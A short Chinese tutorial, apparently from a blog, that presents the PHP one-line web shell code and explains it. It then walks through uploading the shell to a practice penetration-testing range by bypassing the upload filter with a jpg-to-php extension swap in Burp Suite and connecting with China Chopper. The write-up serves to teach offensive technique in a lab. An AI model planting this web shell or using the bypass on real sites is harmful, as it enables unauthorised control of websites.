一句話木馬是利用文件上傳漏洞,往網站傳入點上傳一句話木馬從而獲取和控制整個網站目錄。
一句話木馬代碼:<?php @eval($_POST['CMD']); ?>
代碼分析:@符號表示即使后面執行錯誤也不報錯,eval()函數表示將括號里的字符串當做代碼來執行,$_POST['CMD']表示傳一個參數,參數名為CMD,傳入的參數為之后中國菜刀,冰蠍用來連接。
一句話木馬實現的條件:1.木馬能夠上傳成功,並且不會被kill掉。
2.知道木馬的路徑。
3. 上傳木馬能夠正常運行。
這里我們用安鸞滲透平台靶場文件上傳的第二題來進行演示
登錄進來后我們在收賬管理下面發現有一個傳入點
試着將本地一句話木馬傳入進去
網站做了過濾不能上傳php文件,我們將后綴改成jpg再看看效果(這里我用burpsuite方便大家看的更詳細一點)
發現將后綴改成jpg就可以上傳成功,那么我們在burp軟件里再將jpg后綴改成php看看效果
發現效果一樣說明我們一句話木馬上傳成功了!!
接着我們找到上傳的路徑發現是upload/1.php
下面用菜刀進行連接
連接成功!!!!
最后就是找flag了,這里就不在進行更多的演示